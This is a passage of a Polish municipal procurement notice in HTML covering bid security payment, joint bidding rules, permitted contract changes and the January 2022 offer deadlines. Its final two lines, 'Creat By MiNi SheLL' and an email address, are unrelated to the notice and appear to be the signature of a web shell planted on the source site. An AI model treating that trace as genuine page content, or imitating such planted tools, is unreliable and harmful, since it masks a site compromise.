powinna znaleźć się nazwa oraz numer przedmiotowego postępowania.<br/>1.5. Postanowienia ust. 1.4. powyżej stosuje się odpowiednio do poręczeń, określonych powyżej<br/>w ust. 1.3. lit d powyżej.<br/>1.6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek<br/>Zamawiającego:<br/>Bank Spółdzielczy w Kórniku<br/>nr rachunku: 68 9076 0008 2001 0015 1106 0003<br/>tytuł (wadium, nr sprawy ZP.271.6.2021)<br/>1.7. Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy<br/>przekazać Zamawiającemu w oryginale, w postaci elektronicznej.<br/>1.8. Zwrot wadium następuje na zasadach określonych w art. 98 ust. 1-5 Pzp<br/>1.9. Utrata wadium następuje w przypadkach określonych w art. 98 ust. 6 Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać<br/>warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych<br/>warunków zgodnie z zapisami zawartymi w pkt 6 i 7 SWZ.<br/>2. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym<br/>postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>3. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>4. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana<br/>za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, mogą zostać wezwani<br/>do przedstawienia Zamawiającemu umowy regulującej ich współpracę.<br/>5. Zamawiający wymaga podania w ofercie, które z elementy przedmiotu zamówienia zostaną<br/>wykonane przez poszczególnych wykonawców występujących wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Kierując się zapisami art. 455 ust. 1 pkt 1 ust. pzp, Zamawiający(dalej:Z)dopuszcza dokonanie<br/>zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano<br/>wyboru Wykonawcy(W.) w następujących przypadkach (przy czym zmiana umowy na podstawie<br/>art. 455 ust. 2 ust. pzp jest możliwa niezależnie od przesłanek wskazanych w ppkt 1-4<br/>poniżej):1)zmiana terminu realizacji przedmiotu umowy: a) w wyniku wystąpienia okoliczności<br/>lub zdarzeń takich jak siła wyższa – rozumiana jako zdarzenie nagłe, zewnętrzne, niezależne od<br/>woli stron, w tym również wyjątkowo niesprzyjające warunki pogodowe, uniemożliwiające<br/>terminowe wykonanie umowy, b)jeżeli W. złoży wniosek o skrócenie terminu wykonania umowy,<br/>a zmiana jest korzystna dla Z., c)gdy wystąpi konieczność wykonania robót zamiennych,<br/>dodatkowych lub innych robót niezbędnych do wykonania przedmiotu umowy ze względu na<br/>zasady wiedzy technicznej, oraz udzielenia zamówień dodatk., które wstrzymują lub opóźniają realizację przedm. umowy- o czas niezbędny na ich wykonanie i przeprowadzenie formalności<br/>prawnych z tym związanych, c)wystąpienia odmiennych od przyjętych w dokumentacji warunków<br/>terenowych związanych z istnieniem niezinwent.podziem. sieci, instalacji, urządzeń lub obiektów<br/>budowl. skutkujących niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych<br/>założeniach technol. lub materiałowych, d)wystąpienia odmiennych od przyjętych w<br/>dokumentacji warunków geolog. (kategoria gruntu, kurzawka, głazy narzutowe itp.) oraz<br/>warunków archeolog. związanych z koniecznością prowadzenia badań archeolog., f)zmiany<br/>będące następstwem działania organów administracji, w szczególności:- przekroczenie<br/>zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń,<br/>itp.,- odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na<br/>skutek błędów w dokumentacji projektowej,- wydanie postanowienia o wstrzymaniu robót<br/>budowlanych, w przypadku o którym mowa w art. 50 ust. 1 pkt 4 ustawy Prawo bud.,-<br/>konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego<br/>konieczności nie przewidywano przy zawieraniu umowy,- konieczność zaspokojenia roszczeń<br/>lub oczekiwań osób trzecich – w tym grup społecznych lub zawodowych nie artykułowanych lub<br/>nie możliwych do jednoznacznego określenia w chwili zawierania umowy, - W przypadku<br/>wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 pkt 1 lit. a, c-f termin wykonania<br/>umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia<br/>wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych<br/>okoliczności.2)zmiana sposobu spełnienia świadczenia: a)zmiany technolog., w szczególności: -<br/>niedostępność na rynku materiałów lub urządzeń wskazanych w ofercie, dokumentacji proj. lub<br/>techn. spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub<br/>urządzeń,- pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających<br/>na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego<br/>przedmiotu umowy,- pojawienie się nowszej technologii wykonania przedm. zamówienia<br/>pozwalającej na zaoszczędzenie czasu realizacji zamówienia lub jego kosztów, jak również<br/>kosztów eksploatacji wykonanego przedmiotu umowy, -zrealizowania projektu przy<br/>zastosowaniu innych rozwiązań techn./technol. niż wskazane w ofercie, dokumentacji<br/>projektowej lub technicznej w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło<br/>niewykonaniem lub wadliwym wykonaniem projektu,- odmienne od przyjętych w dokumentacji<br/>proj. warunki geologiczne (kategorie gruntu, kurzawka itp.) skutkujące niemożliwością<br/>zrealizowania przedmiotu umowy przy dotychczasowych założeniach technol.-konieczność<br/>zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze<br/>względu na zmiany obowiązującego prawa,Pozostałe możliwości zmiany umowy ze wzgl.na ograniczoną liczbę znaków znajdują się SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kleszczewo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-14 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com